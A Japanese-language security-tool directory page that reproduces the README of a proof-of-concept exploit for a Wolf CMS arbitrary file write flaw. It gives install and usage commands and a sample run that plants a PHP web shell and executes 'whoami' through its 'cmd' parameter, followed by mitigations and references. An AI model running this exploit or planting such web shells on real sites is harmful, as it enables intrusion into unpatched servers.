Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-67206 — Wolf CMS <= 0.8.3.1 用の PoC エクスプロイト: Admin に認証し、FileManagerController を介して /public に任意の PHP ファイルを書き込み、Web シェルを通じてコマンドを実行します。 | Kitploit
ツール/GitHubGitHub/anirbala98/cve-2026-67206
エクスプロイトウェブアプリケーション悪用ポストエクスプロイトペネトレーションテスト学習と教育ペイロード開発
GitHubanirbala98/cve-2026-67206

CVE-2026-67206

Wolf CMS <= 0.8.3.1 用の PoC エクスプロイト: Admin に認証し、FileManagerController を介して /public に任意の PHP ファイルを書き込み、Web シェルを通じてコマンドを実行します。

リポジトリを見る
1321日前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2026-67206 - Wolf CMS <= 0.8.3.1 - 任意ファイル書き込みによるRCE

このリポジトリには、CVE-2026-67206 の Proof of Concept(PoC) エクスプロイトが含まれています。

免責事項

このプロジェクトは、教育目的および許可されたセキュリティテストのためにのみ提供されています。所有していない、またはテストする許可がないシステムに対して使用しないでください。

概要

Wolf CMS バージョン 0.8.3.1 以前には、任意ファイル書き込みの脆弱性が存在します。これにより、認証済みの攻撃者が FileManagerController.php の create_file() および save() 関数を介して、Web ルートの /public ディレクトリに悪意のある任意のファイルを書き込むことができます。FileManagerController.php の create_file() 関数はファイル拡張子を検証しないため、認証済みの攻撃者が悪意のある PHP スクリプトを書き込み、リモートコード実行権限を取得することが可能になります。

ソースコード分析とエクスプロイトのデモを含む詳細な解説は、私の Medium ブログに掲載されています。

影響を受けるバージョン

Wolf CMS の全バージョン(0.8.3.1 まで)が影響を受けます。Wolf CMS リポジトリは 2021年8月28日 にアーカイブされ、現在は積極的にメンテナンスされていません。この脆弱性に対するパッチは現在存在しません。

要件

  • Python 3.13.14
  • Requests 2.32.5
  • Beautifulsoup4 4.15.0

インストール

root@kitploit:~
git clone https://github.com/anirbala98/CVE-2026-67206.git
cd CVE-2026-67206/
pip install -r requirements.txt

使用方法

root@kitploit:~
python exploit.py <base_url> -u <username> -p <password>
python exploit.py http://127.0.0.1:8080/ -u admin -p admin

実行例

root@kitploit:~
└─$ python exploit.py http://127.0.0.1:8080/ -u admin -p 12966cc814K 
[*] Logging in with provided credentials...
[+] Login successful

[*] Creating a file named shell.php...
[+] File creation successful

[*] Attempting to write payload to shell.php...
[+] Payload written successfully!
[+] Web shell can be accessed with 'cmd' query string at http://127.0.0.1:8080/public/shell.php
[+] Testing output of http://127.0.0.1:8080/public/shell.php?cmd=whoami
www-data

緩和策

  • 認証済みユーザーが作成するファイルの拡張子を、許可リストに基づいて検証する
  • 特に必要でない限り、.php、.phtml、.phar、.php5 などの拡張子を許可しない
  • Web サーバールートのアップロードディレクトリでの PHP 実行を許可しない
  • 影響を最小限に抑えるため、可能であれば作成したファイルを別のサーバーに保存する

参考情報

  • https://www.tenable.com/cve/CVE-2026-67206
  • https://github.com/Caycon/cve-advisories/blob/main/2026/WolfCms/CVE-2026-67206.md
  • https://anirbala98.medium.com/from-source-code-to-exploit-understanding-cve-2026-67206-0ad3ae08bc78
ツールをダウンロード